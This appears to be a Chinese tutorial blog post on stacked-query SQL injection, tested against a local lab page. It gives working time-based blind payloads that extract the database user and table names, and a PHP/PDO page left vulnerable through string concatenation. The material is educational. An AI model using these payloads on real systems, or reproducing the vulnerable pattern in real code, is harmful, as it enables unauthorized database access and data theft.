当前位置:首页 » 《随便一记》 » 正文

Web安全原理剖析(六)——堆叠查询注入攻击_Phantom03167的博客

5 人参与  2021年11月17日 11:43  分类 : 《随便一记》  评论

点击全文阅读


目录

      • 2.3 堆叠查询注入攻击
      • 2.4 堆叠准入代码分析


2.3 堆叠查询注入攻击

  堆叠查询注入攻击的测试地址:http://127.0.0.1/sqli/duidie.php?id=1。

  堆叠查询可以执行多条语句,多语句之间以分好隔开。堆叠查询注入就是利用这个特点,在第二个SQL语句中构造自己要执行的语句。首先访问id=1’,页面返回MySQL错误,在访问id=1’–+,页面返回正常的结果。这里可以使用Boolean注入、时间注入,也可以使用另一种注入方式——堆叠注入。

  堆叠注入的语句为:

';select if(substr(user(),1,1)='r',sleep(3),1)--+

  从堆叠注入语句中可以看到,第二条SQL语句就是时间盲注的语句,执行结果如图37所示。


图38 利用堆叠注入获取数据

  后面获取数据的操作与时间盲注的一样,通过构造不同的时间注入语句,可以得到完整的数据库的库名、表名、字段名和具体数据。执行以下语句,就可以获取数据库的表名。

';select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='e',sleep(3),1)--+

  结果如图38所示。


图39 利用堆叠注入获取表名

2.4 堆叠准入代码分析

  在堆叠注入页面中,程序获取GET参数ID,使用PDO的方式进行数据查询,但仍然将参数ID拼接到查询语句,导致PDO没起到预编译的效果,程序仍然存在SQL注入漏洞,代码如下所示。

<?php header('Content-type:text/html;charset=utf-8');
try
{
    $conn = new PDO("mysql:host=localhost;dbname=test", "root", "root");//连接数据库,初始化一个pdo对象
    $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);//设置一个属性

    $id = @$_GET['id'];
    $sql = "select * from users where `id`='".$id."'";

    echo "<hr />";
    echo "当前执行语句为:".$sql;
    echo "<hr />";

    $stmt = $conn->query($sql);

    $result = $stmt->setFetchMode(PDO::FETCH_ASSOC);
    foreach($stmt->fetchAll() as $k=>$v)
    {
        foreach ($v as $key => $value)
        {
            echo $value;
        }
    }
    $dsn = null;
}
catch(PDOException $e)
{
    echo "error";
}
$conn = null;
?>

  使用PDO执行SQL语句时,可以执行多语句,不过这样通常不能直接得到注入结果,因为PDO只会返回第一条SQL语句执行的结果,所以在第二条语句中可以用Update更新数据或者使用时间盲注获取数据。访问dd.php?id=1’;select if(ord(substring(user(),1,1))=114,sleep(3),1);%23时,执行的SQL语句为:

select * from users where `id`='1';select if(ord(substring(user(),1,1))=114,sleep(3),1);#

  此时SQL语句分为另外两条,第一条select * from users where `id`='1’是代码自己的select查询,而select if(ord(substring(user(),1,1))=114,sleep(3),1);#则是我们构造的时间盲注语句。



点击全文阅读


本文链接:http://m.zhangshiyu.com/post/30976.html

语句  堆叠  注入  
<< 上一篇 下一篇 >>

  • 评论(0)
  • 赞助本站

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。

最新文章

  • 最新章节_笔趣阁(方黎萧明德)方黎萧明德小说(心跳谋杀论)在线畅读阅读
  • 明月独照成双高分完本(顾明玉齐远修)全书免费_(顾明玉齐远修)明月独照成双高分完本后续(顾明玉齐远修)
  • 真千金的妈,女凭母贵的我内容精选(娇娇顾静怡江稚雅)
  • 雪上春霜在线温观意陆一然完本_雪上春霜在线(温观意陆一然)
  • 男友车祸断腿时,我和新欢在车内拥吻高分言情_陈行简江若***新书_小说后续在线阅读_无删减免费完结_
  • 完结文重生高考填报志愿时,我放任全班上大专好文分享列表_完结文重生高考填报志愿时,我放任全班上大专好文分享(颜禾晚宋津年叶淼淼)
  • 陆寒澈沈秋晚小说完本+外篇(相逢难逃别离)畅享阅读
  • 雪上春霜删减内容修复版本(温观意陆一然)_雪上春霜删减内容修复版本(温观意陆一然)
  • 骤雨淋落晚星(林晚星裴临川)全书浏览_骤雨淋落晚星全书浏览
  • 全书浏览重生高考填报志愿时我放任全班上大专+后续(叶淼淼宋津年颜禾晚)_重生高考填报志愿时我放任全班上大专+后续(叶淼淼宋津年颜禾晚)全书结局
  • 他的甜撩藏不住附加黎初谢时晏:结局+番外免费品鉴(他的甜撩藏不住)全本浏览阅读连载中
  • 全文他死遁后逼疯清冷女权臣+完结+后续(苏煜顾宛柔)列表_全文他死遁后逼疯清冷女权臣+完结+后续

    关于我们 | 我要投稿 | 免责申明

    Copyright © 2020-2022 ZhangShiYu.com Rights Reserved.豫ICP备2022013469号-1